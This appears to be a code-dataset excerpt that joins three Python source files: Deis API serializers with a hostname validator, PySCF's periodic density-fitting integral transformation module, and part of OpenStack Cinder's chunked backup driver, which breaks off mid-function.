"""Metadata options for a :class:`ReleaseSerializer`."""
model = models.Release
class ContainerSerializer(ModelSerializer):
"""Serialize a :class:`~api.models.Container` model."""
app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
owner = serializers.ReadOnlyField(source='owner.username')
created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
release = serializers.SerializerMethodField()
class Meta:
"""Metadata options for a :class:`ContainerSerializer`."""
model = models.Container
fields = ['owner', 'app', 'release', 'type', 'num', 'state', 'created', 'updated', 'uuid']
def get_release(self, obj):
return "v{}".format(obj.release.version)
class KeySerializer(ModelSerializer):
"""Serialize a :class:`~api.models.Key` model."""
owner = serializers.ReadOnlyField(source='owner.username')
fingerprint = serializers.CharField(read_only=True)
created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
class Meta:
"""Metadata options for a KeySerializer."""
model = models.Key
class DomainSerializer(ModelSerializer):
"""Serialize a :class:`~api.models.Domain` model."""
app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
owner = serializers.ReadOnlyField(source='owner.username')
created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
class Meta:
"""Metadata options for a :class:`DomainSerializer`."""
model = models.Domain
fields = ['uuid', 'owner', 'created', 'updated', 'app', 'domain']
def validate_domain(self, value):
"""
Check that the hostname is valid
"""
if len(value) > 255:
raise serializers.ValidationError('Hostname must be 255 characters or less.')
if value[-1:] == ".":
value = value[:-1] # strip exactly one dot from the right, if present
labels = value.split('.')
if 'xip.io' in value:
return value
if labels[0] == '*':
raise serializers.ValidationError(
'Adding a wildcard subdomain is currently not supported.')
allowed = re.compile("^(?!-)[a-z0-9-]{1,63}(?<!-)$", re.IGNORECASE)
for label in labels:
match = allowed.match(label)
if not match or '--' in label or label.isdigit() or \
len(labels) == 1 and any(char.isdigit() for char in label):
raise serializers.ValidationError('Hostname does not look valid.')
if models.Domain.objects.filter(domain=value).exists():
raise serializers.ValidationError(
"The domain {} is already in use by another app".format(value))
return value
class CertificateSerializer(ModelSerializer):
"""Serialize a :class:`~api.models.Cert` model."""
owner = serializers.ReadOnlyField(source='owner.username')
expires = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
class Meta:
"""Metadata options for a DomainCertSerializer."""
model = models.Certificate
extra_kwargs = {'certificate': {'write_only': True},
'key': {'write_only': True},
'common_name': {'required': False}}
read_only_fields = ['expires', 'created', 'updated']
class PushSerializer(ModelSerializer):
"""Serialize a :class:`~api.models.Push` model."""
app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
owner = serializers.ReadOnlyField(source='owner.username')
created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
class Meta:
"""Metadata options for a :class:`PushSerializer`."""
model = models.Push
fields = ['uuid', 'owner', 'app', 'sha', 'fingerprint', 'receive_user', 'receive_repo',
'ssh_connection', 'ssh_original_command', 'created', 'updated']
| 39.557864 | 98 | 0.652164 |
a51f126876a2e5ae1c72e44b18ef75383b05b813 | 7,868 | py | Python | pyscf/pbc/df/df_ao2mo.py | nmardirossian/pyscf | 57c8912dcfcc1157a822feede63df54ed1067115 | [
"BSD-2-Clause"
] | 1 | 2018-05-02T19:55:30.000Z | 2018-05-02T19:55:30.000Z | pyscf/pbc/df/df_ao2mo.py | nmardirossian/pyscf | 57c8912dcfcc1157a822feede63df54ed1067115 | [
"BSD-2-Clause"
] | null | null | null | pyscf/pbc/df/df_ao2mo.py | nmardirossian/pyscf | 57c8912dcfcc1157a822feede63df54ed1067115 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
import numpy
from pyscf import lib
from pyscf import ao2mo
from pyscf.ao2mo import _ao2mo
from pyscf.ao2mo.incore import iden_coeffs, _conc_mos
from pyscf.pbc.df.df_jk import zdotNN, zdotCN, zdotNC
from pyscf.pbc.df.fft_ao2mo import _format_kpts
from pyscf.pbc.lib.kpts_helper import is_zero, gamma_point
def get_eri(mydf, kpts=None, compact=True):
if mydf._cderi is None:
mydf.build()
cell = mydf.cell
kptijkl = _format_kpts(kpts)
kpti, kptj, kptk, kptl = kptijkl
nao = cell.nao_nr()
nao_pair = nao * (nao+1) // 2
max_memory = max(2000, mydf.max_memory-lib.current_memory()[0]-nao**4*8/1e6)
####################
# gamma point, the integral is real and with s4 symmetry
if gamma_point(kptijkl):
eriR = numpy.zeros((nao_pair,nao_pair))
for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, True):
lib.ddot(LpqR.T, LpqR, 1, eriR, 1)
LpqR = LpqI = None
if not compact:
eriR = ao2mo.restore(1, eriR, nao).reshape(nao**2,-1)
return eriR
elif is_zero(kpti-kptk) and is_zero(kptj-kptl):
eriR = numpy.zeros((nao*nao,nao*nao))
eriI = numpy.zeros((nao*nao,nao*nao))
for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, False):
zdotNN(LpqR.T, LpqI.T, LpqR, LpqI, 1, eriR, eriI, 1)
LpqR = LpqI = None
return eriR + eriI*1j
####################
# (kpt) i == j == k == l != 0
#
# (kpt) i == l && j == k && i != j && j != k =>
# both vbar and ovlp are zero. It corresponds to the exchange integral.
#
# complex integrals, N^4 elements
elif is_zero(kpti-kptl) and is_zero(kptj-kptk):
eriR = numpy.zeros((nao*nao,nao*nao))
eriI = numpy.zeros((nao*nao,nao*nao))
for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, False):
zdotNC(LpqR.T, LpqI.T, LpqR, LpqI, 1, eriR, eriI, 1)
LpqR = LpqI = None
# transpose(0,1,3,2) because
# j == k && i == l =>
# (L|ij).transpose(0,2,1).conj() = (L^*|ji) = (L^*|kl) => (M|kl)
eri = lib.transpose((eriR+eriI*1j).reshape(-1,nao,nao), axes=(0,2,1))
return eri.reshape(nao**2,-1)
####################
# aosym = s1, complex integrals
#
# kpti == kptj => kptl == kptk
# If kpti == kptj, (kptl-kptk)*a has to be multiples of 2pi because of the wave
# vector symmetry. k is a fraction of reciprocal basis, 0 < k/b < 1, by definition.
# So kptl/b - kptk/b must be -1 < k/b < 1.
#
else:
eriR = numpy.zeros((nao*nao,nao*nao))
eriI = numpy.zeros((nao*nao,nao*nao))
for (LpqR, LpqI), (LrsR, LrsI) in \
lib.izip(mydf.sr_loop(kptijkl[:2], max_memory, False),
mydf.sr_loop(kptijkl[2:], max_memory, False)):
zdotNN(LpqR.T, LpqI.T, LrsR, LrsI, 1, eriR, eriI, 1)
LpqR = LpqI = LrsR = LrsI = None
return eriR + eriI*1j
def general(mydf, mo_coeffs, kpts=None, compact=True):
if mydf._cderi is None:
mydf.build()
kptijkl = _format_kpts(kpts)
kpti, kptj, kptk, kptl = kptijkl
if isinstance(mo_coeffs, numpy.ndarray) and mo_coeffs.ndim == 2:
mo_coeffs = (mo_coeffs,) * 4
all_real = not any(numpy.iscomplexobj(mo) for mo in mo_coeffs)
max_memory = max(2000, (mydf.max_memory - lib.current_memory()[0]) * .5)
####################
# gamma point, the integral is real and with s4 symmetry
if gamma_point(kptijkl) and all_real:
ijmosym, nij_pair, moij, ijslice = _conc_mos(mo_coeffs[0], mo_coeffs[1], compact)
klmosym, nkl_pair, mokl, klslice = _conc_mos(mo_coeffs[2], mo_coeffs[3], compact)
eri_mo = numpy.zeros((nij_pair,nkl_pair))
sym = (iden_coeffs(mo_coeffs[0], mo_coeffs[2]) and
iden_coeffs(mo_coeffs[1], mo_coeffs[3]))
ijR = klR = None
for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, True):
ijR, klR = _dtrans(LpqR, ijR, ijmosym, moij, ijslice,
LpqR, klR, klmosym, mokl, klslice, sym)
lib.ddot(ijR.T, klR, 1, eri_mo, 1)
LpqR = LpqI = None
return eri_mo
elif is_zero(kpti-kptk) and is_zero(kptj-kptl):
mo_coeffs = _mo_as_complex(mo_coeffs)
nij_pair, moij, ijslice = _conc_mos(mo_coeffs[0], mo_coeffs[1])[1:]
nkl_pair, mokl, klslice = _conc_mos(mo_coeffs[2], mo_coeffs[3])[1:]
eri_mo = numpy.zeros((nij_pair,nkl_pair), dtype=numpy.complex)
sym = (iden_coeffs(mo_coeffs[0], mo_coeffs[2]) and
iden_coeffs(mo_coeffs[1], mo_coeffs[3]))
zij = zkl = None
for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, False):
buf = LpqR+LpqI*1j
zij, zkl = _ztrans(buf, zij, moij, ijslice,
buf, zkl, mokl, klslice, sym)
lib.dot(zij.T, zkl, 1, eri_mo, 1)
LpqR = LpqI = buf = None
return eri_mo
####################
# (kpt) i == j == k == l != 0
# (kpt) i == l && j == k && i != j && j != k =>
#
elif is_zero(kpti-kptl) and is_zero(kptj-kptk):
mo_coeffs = _mo_as_complex(mo_coeffs)
nij_pair, moij, ijslice = _conc_mos(mo_coeffs[0], mo_coeffs[1])[1:]
nlk_pair, molk, lkslice = _conc_mos(mo_coeffs[3], mo_coeffs[2])[1:]
eri_mo = numpy.zeros((nij_pair,nlk_pair), dtype=numpy.complex)
sym = (iden_coeffs(mo_coeffs[0], mo_coeffs[3]) and
iden_coeffs(mo_coeffs[1], mo_coeffs[2]))
zij = zlk = None
for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, False):
buf = LpqR+LpqI*1j
zij, zlk = _ztrans(buf, zij, moij, ijslice,
buf, zlk, molk, lkslice, sym)
lib.dot(zij.T, zlk.conj(), 1, eri_mo, 1)
LpqR = LpqI = buf = None
nmok = mo_coeffs[2].shape[1]
nmol = mo_coeffs[3].shape[1]
eri_mo = lib.transpose(eri_mo.reshape(-1,nmol,nmok), axes=(0,2,1))
return eri_mo.reshape(nij_pair,nlk_pair)
####################
# aosym = s1, complex integrals
#
# If kpti == kptj, (kptl-kptk)*a has to be multiples of 2pi because of the wave
# vector symmetry. k is a fraction of reciprocal basis, 0 < k/b < 1, by definition.
# So kptl/b - kptk/b must be -1 < k/b < 1. => kptl == kptk
#
else:
mo_coeffs = _mo_as_complex(mo_coeffs)
nij_pair, moij, ijslice = _conc_mos(mo_coeffs[0], mo_coeffs[1])[1:]
nkl_pair, mokl, klslice = _conc_mos(mo_coeffs[2], mo_coeffs[3])[1:]
eri_mo = numpy.zeros((nij_pair,nkl_pair), dtype=numpy.complex)
zij = zkl = None
for (LpqR, LpqI), (LrsR, LrsI) in \
lib.izip(mydf.sr_loop(kptijkl[:2], max_memory, False),
mydf.sr_loop(kptijkl[2:], max_memory, False)):
zij, zkl = _ztrans(LpqR+LpqI*1j, zij, moij, ijslice,
LrsR+LrsI*1j, zkl, mokl, klslice, False)
lib.dot(zij.T, zkl, 1, eri_mo, 1)
LpqR = LpqI = LrsR = LrsI = None
return eri_mo
def _mo_as_complex(mo_coeffs):
mos = []
for c in mo_coeffs:
if c.dtype == numpy.float64:
mos.append(c+0j)
else:
mos.append(c)
return mos
def _dtrans(Lpq, Lij, ijmosym, moij, ijslice,
Lrs, Lkl, klmosym, mokl, klslice, sym):
Lij = _ao2mo.nr_e2(Lpq, moij, ijslice, aosym='s2', mosym=ijmosym, out=Lij)
if sym:
Lkl = Lij
else:
Lkl = _ao2mo.nr_e2(Lrs, mokl, klslice, aosym='s2', mosym=klmosym, out=Lkl)
return Lij, Lkl
def _ztrans(Lpq, zij, moij, ijslice, Lrs, zkl, mokl, klslice, sym):
tao = []
ao_loc = None
zij = _ao2mo.r_e2(Lpq, moij, ijslice, tao, ao_loc, out=zij)
if sym:
zkl = zij
else:
zkl = _ao2mo.r_e2(Lrs, mokl, klslice, tao, ao_loc, out=zkl)
return zij, zkl
| 38.568627 | 89 | 0.579944 |
b620c5e22ca4d96d36dfe289e863959f2ee7fcd0 | 32,517 | py | Python | cinder/backup/chunkeddriver.py | wzhou007/stx-cinder | bdc6cc8ae5466f218de5af835e9ec040d537c541 | [
"Apache-2.0"
] | null | null | null | cinder/backup/chunkeddriver.py | wzhou007/stx-cinder | bdc6cc8ae5466f218de5af835e9ec040d537c541 | [
"Apache-2.0"
] | null | null | null | cinder/backup/chunkeddriver.py | wzhou007/stx-cinder | bdc6cc8ae5466f218de5af835e9ec040d537c541 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2014 TrilioData, Inc
# Copyright (c) 2015 EMC Corporation
# Copyright (C) 2015 Kevin Fox <kevin@efox.cc>
# Copyright (C) 2015 Tom Barron <tpb@dyncloud.net>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic base class to implement metadata, compression and chunked data
operations
"""
import abc
import hashlib
import json
import os
import eventlet
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import units
import six
from cinder.backup import driver
from cinder import exception
from cinder.i18n import _
from cinder import objects
from cinder.objects import fields
from cinder.volume import utils as volume_utils
LOG = logging.getLogger(__name__)
chunkedbackup_service_opts = [
cfg.StrOpt('backup_compression_algorithm',
default='zlib',
choices=['none', 'off', 'no',
'zlib', 'gzip',
'bz2', 'bzip2'],
help='Compression algorithm (None to disable)'),
]
CONF = cfg.CONF
CONF.register_opts(chunkedbackup_service_opts)
@six.add_metaclass(abc.ABCMeta)
class ChunkedBackupDriver(driver.BackupDriver):
"""Abstract chunked backup driver.
Implements common functionality for backup drivers that store volume
data in multiple "chunks" in a backup repository when the size of
the backed up cinder volume exceeds the size of a backup repository
"chunk."
Provides abstract methods to be implemented in concrete chunking
drivers.
"""
DRIVER_VERSION = '1.0.0'
DRIVER_VERSION_MAPPING = {'1.0.0': '_restore_v1'}
def _get_compressor(self, algorithm):
try:
if algorithm.lower() in ('none', 'off', 'no'):
return None
elif algorithm.lower() in ('zlib', 'gzip'):
import zlib as compressor
return compressor
elif algorithm.lower() in ('bz2', 'bzip2'):
import bz2 as compressor
return compressor
except ImportError:
pass
err = _('unsupported compression algorithm: %s') % algorithm
raise ValueError(err)
def __init__(self, context, chunk_size_bytes, sha_block_size_bytes,
backup_default_container, enable_progress_timer,
db=None):
super(ChunkedBackupDriver, self).__init__(context, db)
self.chunk_size_bytes = chunk_size_bytes
self.sha_block_size_bytes = sha_block_size_bytes
self.backup_default_container = backup_default_container
self.enable_progress_timer = enable_progress_timer
self.backup_timer_interval = CONF.backup_timer_interval
self.data_block_num = CONF.backup_object_number_per_notification
self.az = CONF.storage_availability_zone
self.backup_compression_algorithm = CONF.backup_compression_algorithm
self.compressor = \
self._get_compressor(CONF.backup_compression_algorithm)
self.support_force_delete = True
# To create your own "chunked" backup driver, implement the following
# abstract methods.
@abc.abstractmethod
def put_container(self, container):
"""Create the container if needed. No failure if it pre-exists."""
return
@abc.abstractmethod
def get_container_entries(self, container, prefix):
"""Get container entry names."""
return
@abc.abstractmethod
def get_object_writer(self, container, object_name, extra_metadata=None):
"""Returns a writer object which stores the chunk data in backup repository.
The object returned should be a context handler that can be used
in a "with" context.
"""
return
@abc.abstractmethod
def get_object_reader(self, container, object_name, extra_metadata=None):
"""Returns a reader object for the backed up chunk."""
return
@abc.abstractmethod
def delete_object(self, container, object_name):
"""Delete object from container."""
return
@abc.abstractmethod
def _generate_object_name_prefix(self, backup):
return
@abc.abstractmethod
def update_container_name(self, backup, container):
"""Allow sub-classes to override container name.
This method exists so that sub-classes can override the container name
as it comes in to the driver in the backup object. Implementations
should return None if no change to the container name is desired.
"""
return
@abc.abstractmethod
def get_extra_metadata(self, backup, volume):
"""Return extra metadata to use in prepare_backup.
This method allows for collection of extra metadata in prepare_backup()
which will be passed to get_object_reader() and get_object_writer().
Subclass extensions can use this extra information to optimize
data transfers. Return a json serializable object.
"""
return
def _create_container(self, backup):
# Container's name will be decided by the driver (returned by method
# update_container_name), if no change is required by the driver then
# we'll use the one the backup object already has, but if it doesn't
# have one backup_default_container will be used.
new_container = self.update_container_name(backup, backup.container)
if new_container:
# If the driver is not really changing the name we don't want to
# dirty the field in the object and save it to the DB with the same
# value.
if new_container != backup.container:
backup.container = new_container
elif backup.container is None:
backup.container = self.backup_default_container
LOG.debug('_create_container started, container: %(container)s,'
'backup: %(backup_id)s.',
{'container': backup.container, 'backup_id': backup.id})
backup.save()
self.put_container(backup.container)
return backup.container
def _generate_object_names(self, backup):
prefix = backup['service_metadata']
object_names = self.get_container_entries(backup['container'], prefix)
LOG.debug('generated object list: %s.', object_names)
return object_names
def _metadata_filename(self, backup):
object_name = backup['service_metadata']
filename = '%s_metadata' % object_name
return filename
def _sha256_filename(self, backup):
object_name = backup['service_metadata']
filename = '%s_sha256file' % object_name
return filename
def _write_metadata(self, backup, volume_id, container, object_list,
volume_meta, extra_metadata=None):
filename = self._metadata_filename(backup)
LOG.debug('_write_metadata started, container name: %(container)s,'
' metadata filename: %(filename)s.',
{'container': container, 'filename': filename})
metadata = {}
metadata['version'] = self.DRIVER_VERSION
metadata['backup_id'] = backup['id']
metadata['volume_id'] = volume_id
metadata['backup_name'] = backup['display_name']
metadata['backup_description'] = backup['display_description']
metadata['created_at'] = str(backup['created_at'])
metadata['objects'] = object_list
metadata['parent_id'] = backup['parent_id']
metadata['volume_meta'] = volume_meta
if extra_metadata:
metadata['extra_metadata'] = extra_metadata
metadata_json = json.dumps(metadata, sort_keys=True, indent=2)
if six.PY3:
metadata_json = metadata_json.encode('utf-8')
with self.get_object_writer(container, filename) as writer:
writer.write(metadata_json)
LOG.debug('_write_metadata finished. Metadata: %s.', metadata_json)
def _write_sha256file(self, backup, volume_id, container, sha256_list):
filename = self._sha256_filename(backup)
LOG.debug('_write_sha256file started, container name: %(container)s,'
' sha256file filename: %(filename)s.',
{'container': container, 'filename': filename})
sha256file = {}
sha256file['version'] = self.DRIVER_VERSION
sha256file['backup_id'] = backup['id']
sha256file['volume_id'] = volume_id
sha256file['backup_name'] = backup['display_name']
sha256file['backup_description'] = backup['display_description']
sha256file['created_at'] = six.text_type(backup['created_at'])
sha256file['chunk_size'] = self.sha_block_size_bytes
sha256file['sha256s'] = sha256_list
sha256file_json = json.dumps(sha256file, sort_keys=True, indent=2)
if six.PY3:
sha256file_json = sha256file_json.encode('utf-8')
with self.get_object_writer(container, filename) as writer:
writer.write(sha256file_json)
LOG.debug('_write_sha256file finished.')
def _read_metadata(self, backup):
container = backup['container']
filename = self._metadata_filename(backup)
LOG.debug('_read_metadata started, container name: %(container)s, '
'metadata filename: %(filename)s.',
{'container': container, 'filename': filename})
with self.get_object_reader(container, filename) as reader:
metadata_json = reader.read()
if six.PY3:
metadata_json = metadata_json.decode('utf-8')
metadata = json.loads(metadata_json)
LOG.debug('_read_metadata finished. Metadata: %s.', metadata_json)
return metadata
def _read_sha256file(self, backup):
container = backup['container']
filename = self._sha256_filename(backup)
LOG.debug('_read_sha256file started, container name: %(container)s, '
'sha256 filename: %(filename)s.',
{'container': container, 'filename': filename})
with self.get_object_reader(container, filename) as reader:
sha256file_json = reader.read()
if six.PY3:
sha256file_json = sha256file_json.decode('utf-8')
sha256file = json.loads(sha256file_json)
LOG.debug('_read_sha256file finished.')
return sha256file
def _prepare_backup(self, backup):
"""Prepare the backup process and return the backup metadata."""
volume = self.db.volume_get(self.context, backup.volume_id)
if volume['size'] <= 0:
err = _('volume size %d is invalid.') % volume['size']
raise exception.InvalidVolume(reason=err)
container = self._create_container(backup)
object_prefix = self._generate_object_name_prefix(backup)
backup.service_metadata = object_prefix
backup.save()
volume_size_bytes = volume['size'] * units.Gi
availability_zone = self.az
LOG.debug('starting backup of volume: %(volume_id)s,'
' volume size: %(volume_size_bytes)d, object names'
' prefix %(object_prefix)s, availability zone:'
' %(availability_zone)s',
{
'volume_id': backup.volume_id,
'volume_size_bytes': volume_size_bytes,
'object_prefix': object_prefix,
'availability_zone': availability_zone,
})
object_meta = {'id': 1, 'list': [], 'prefix': object_prefix,
'volume_meta': None}
object_sha256 = {'id': 1, 'sha256s': [], 'prefix': object_prefix}
extra_metadata = self.get_extra_metadata(backup, volume)
if extra_metadata is not None:
object_meta['extra_metadata'] = extra_metadata
return (object_meta, object_sha256, extra_metadata, container,
volume_size_bytes)
def _backup_chunk(self, backup, container, data, data_offset,
object_meta, extra_metadata):
"""Backup data chunk based on the object metadata and offset."""
object_prefix = object_meta['prefix']
object_list = object_meta['list']
object_id = object_meta['id']
object_name = '%s-%05d' % (object_prefix, object_id)
obj = {}
obj[object_name] = {}
obj[object_name]['offset'] = data_offset
obj[object_name]['length'] = len(data)
LOG.debug('Backing up chunk of data from volume.')
algorithm, output_data = self._prepare_output_data(data)
obj[object_name]['compression'] = algorithm
LOG.debug('About to put_object')
with self.get_object_writer(
container, object_name, extra_metadata=extra_metadata
) as writer:
writer.write(output_data)
md5 = hashlib.md5(data).hexdigest()
obj[object_name]['md5'] = md5
LOG.debug('backup MD5 for %(object_name)s: %(md5)s',
{'object_name': object_name, 'md5': md5})
object_list.append(obj)
object_id += 1
object_meta['list'] = object_list
object_meta['id'] = object_id
LOG.debug('Calling eventlet.sleep(0)')
eventlet.sleep(0)
def _prepare_output_data(self, data):
if self.compressor is None:
return 'none', data
data_size_bytes = len(data)
# Execute compression in native thread so it doesn't prevent
# cooperative greenthread switching.
compressed_data = eventlet.tpool.execute(self.compressor.compress,
data)
comp_size_bytes = len(compressed_data)
algorithm = CONF.backup_compression_algorithm.lower()
if comp_size_bytes >= data_size_bytes:
LOG.debug('Compression of this chunk was ineffective: '
'original length: %(data_size_bytes)d, '
'compressed length: %(compressed_size_bytes)d. '
'Using original data for this chunk.',
{'data_size_bytes': data_size_bytes,
'compressed_size_bytes': comp_size_bytes,
})
return 'none', data
LOG.debug('Compressed %(data_size_bytes)d bytes of data '
'to %(comp_size_bytes)d bytes using %(algorithm)s.',
{'data_size_bytes': data_size_bytes,
'comp_size_bytes': comp_size_bytes,
'algorithm': algorithm,
})
return algorithm, compressed_data
def _finalize_backup(self, backup, container, object_meta, object_sha256):
"""Write the backup's metadata to the backup repository."""
object_list = object_meta['list']
object_id = object_meta['id']
volume_meta = object_meta['volume_meta']
sha256_list = object_sha256['sha256s']
extra_metadata = object_meta.get('extra_metadata')
self._write_sha256file(backup,
backup.volume_id,
container,
sha256_list)
self._write_metadata(backup,
backup.volume_id,
container,
object_list,
volume_meta,
extra_metadata)
backup.object_count = object_id
backup.save()
LOG.debug('backup %s finished.', backup['id'])
def _backup_metadata(self, backup, object_meta):
"""Backup volume metadata.
NOTE(dosaboy): the metadata we are backing up is obtained from a
versioned api so we should not alter it in any way here.
We must also be sure that the service that will perform
the restore is compatible with version used.
"""
json_meta = self.get_metadata(backup['volume_id'])
if not json_meta:
LOG.debug("No volume metadata to backup.")
return
object_meta["volume_meta"] = json_meta
def _send_progress_end(self, context, backup, object_meta):
object_meta['backup_percent'] = 100
volume_utils.notify_about_backup_usage(context,
backup,
"createprogress",
extra_usage_info=
object_meta)
def _send_progress_notification(self, context, backup, object_meta,
total_block_sent_num, total_volume_size):
backup_percent = total_block_sent_num * 100 / total_volume_size
object_meta['backup_percent'] = backup_percent
volume_utils.notify_about_backup_usage(context,
backup,
"createprogress",
extra_usage_info=
object_meta)
def backup(self, backup, volume_file, backup_metadata=True):
"""Backup the given volume.
If backup['parent_id'] is given, then an incremental backup
is performed.
"""
if self.chunk_size_bytes % self.sha_block_size_bytes:
err = _('Chunk size is not multiple of '
'block size for creating hash.')
raise exception.InvalidBackup(reason=err)
# Read the shafile of the parent backup if backup['parent_id']
# is given.
parent_backup_shafile = None
parent_backup = None
if backup.parent_id:
parent_backup = objects.Backup.get_by_id(self.context,
backup.parent_id)
parent_backup_shafile = self._read_sha256file(parent_backup)
parent_backup_shalist = parent_backup_shafile['sha256s']
if (parent_backup_shafile['chunk_size'] !=
self.sha_block_size_bytes):
err = (_('Hash block size has changed since the last '
'backup. New hash block size: %(new)s. Old hash '
'block size: %(old)s. Do a full backup.')
% {'old': parent_backup_shafile['chunk_size'],
'new': self.sha_block_size_bytes})
raise exception.InvalidBackup(reason=err)
# If the volume size increased since the last backup, fail
# the incremental backup and ask user to do a full backup.
if backup.size > parent_backup.size:
err = _('Volume size increased since the last '
'backup. Do a full backup.')
raise exception.InvalidBackup(reason=err)
(object_meta, object_sha256, extra_metadata, container,
volume_size_bytes) = self._prepare_backup(backup)
counter = 0
total_block_sent_num = 0
# There are two mechanisms to send the progress notification.
# 1. The notifications are periodically sent in a certain interval.
# 2. The notifications are sent after a certain number of chunks.
# Both of them are working simultaneously during the volume backup,
# when "chunked" backup drivers are deployed.
def _notify_progress():
self._send_progress_notification(self.context, backup,
object_meta,
total_block_sent_num,
volume_size_bytes)
timer = loopingcall.FixedIntervalLoopingCall(
_notify_progress)
if self.enable_progress_timer:
timer.start(interval=self.backup_timer_interval)
sha256_list = object_sha256['sha256s']
shaindex = 0
is_backup_canceled = False
while True:
# First of all, we check the status of this backup. If it
# has been changed to delete or has been deleted, we cancel the
# backup process to do forcing delete.
backup = objects.Backup.get_by_id(self.context, backup.id)
if backup.status in (fields.BackupStatus.DELETING,
fields.BackupStatus.DELETED):
is_backup_canceled = True
# To avoid the chunk left when deletion complete, need to
# clean up the object of chunk again.
self.delete_backup(backup)
LOG.debug('Cancel the backup process of %s.', backup.id)
break
data_offset = volume_file.tell()
data = volume_file.read(self.chunk_size_bytes)
if data == b'':
break
# Calculate new shas with the datablock.
shalist = []
off = 0
datalen = len(data)
while off < datalen:
chunk_start = off
chunk_end = chunk_start + self.sha_block_size_bytes
if chunk_end > datalen:
chunk_end = datalen
chunk = data[chunk_start:chunk_end]
sha = hashlib.sha256(chunk).hexdigest()
shalist.append(sha)
off += self.sha_block_size_bytes
sha256_list.extend(shalist)
# If parent_backup is not None, that means an incremental
# backup will be performed.
if parent_backup:
# Find the extent that needs to be backed up.
extent_off = -1
for idx, sha in enumerate(shalist):
if sha != parent_backup_shalist[shaindex]:
if extent_off == -1:
# Start of new extent.
extent_off = idx * self.sha_block_size_bytes
else:
if extent_off != -1:
# We've reached the end of extent.
extent_end = idx * self.sha_block_size_bytes
segment = data[extent_off:extent_end]
self._backup_chunk(backup, container, segment,
data_offset + extent_off,
object_meta,
extra_metadata)
extent_off = -1
shaindex += 1
# The last extent extends to the end of data buffer.
if extent_off != -1:
extent_end = datalen
segment = data[extent_off:extent_end]
self._backup_chunk(backup, container, segment,
data_offset + extent_off,
object_meta, extra_metadata)
extent_off = -1
else: # Do a full backup.
self._backup_chunk(backup, container, data, data_offset,
object_meta, extra_metadata)
# Notifications
total_block_sent_num += self.data_block_num
counter += 1
if counter == self.data_block_num:
# Send the notification to Ceilometer when the chunk
# number reaches the data_block_num. The backup percentage
# is put in the metadata as the extra information.
self._send_progress_notification(self.context, backup,
object_meta,
total_block_sent_num,
volume_size_bytes)
# Reset the counter
counter = 0
# Stop the timer.
timer.stop()
# If backup has been cancelled we have nothing more to do
# but timer.stop().
if is_backup_canceled:
return
# All the data have been sent, the backup_percent reaches 100.
self._send_progress_end(self.context, backup, object_meta)
object_sha256['sha256s'] = sha256_list
if backup_metadata:
try:
self._backup_metadata(backup, object_meta)
# Whatever goes wrong, we want to log, cleanup, and re-raise.
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception("Backup volume metadata failed.")
self.delete_backup(backup)
self._finalize_backup(backup, container, object_meta, object_sha256)
def _restore_v1(self, backup, volume_id, metadata, volume_file):
"""Restore a v1 volume backup."""
backup_id = backup['id']
LOG.debug('v1 volume backup restore of %s started.', backup_id)
extra_metadata = metadata.get('extra_metadata')
container = backup['container']
metadata_objects = metadata['objects']
metadata_object_names = []
for obj in metadata_objects:
metadata_object_names.extend(obj.keys())
LOG.debug('metadata_object_names = %s.', metadata_object_names)
prune_list = [self._metadata_filename(backup),
self._sha256_filename(backup)]
object_names = [object_name for object_name in
self._generate_object_names(backup)
if object_name not in prune_list]
if sorted(object_names) != sorted(metadata_object_names):
err = _('restore_backup aborted, actual object list '
'does not match object list stored in metadata.')
raise exception.InvalidBackup(reason=err)
for metadata_object in metadata_objects:
object_name, obj = list(metadata_object.items())[0]
LOG.debug('restoring object. backup: %(backup_id)s, '
'container: %(container)s, object name: '
'%(object_name)s, volume: %(volume_id)s.',
{
'backup_id': backup_id,
'container': container,
'object_name': object_name,
'volume_id': volume_id,
})
with self.get_object_reader(
container, object_name,
extra_metadata=extra_metadata) as reader:
body = reader.read()
compression_algorithm = metadata_object[object_name]['compression']
decompressor = self._get_compressor(compression_algorithm)
volume_file.seek(obj['offset'])
if decompressor is not None:
LOG.debug('decompressing data using %s algorithm',
compression_algorithm)
decompressed = decompressor.decompress(body)
volume_file.write(decompressed)
else:
volume_file.write(body)
# force flush every write to avoid long blocking write on close
volume_file.flush()
# Be tolerant to IO implementations that do not support fileno()
try:
fileno = volume_file.fileno()
except IOError:
LOG.info("volume_file does not support fileno() so skipping "
"fsync()")
else:
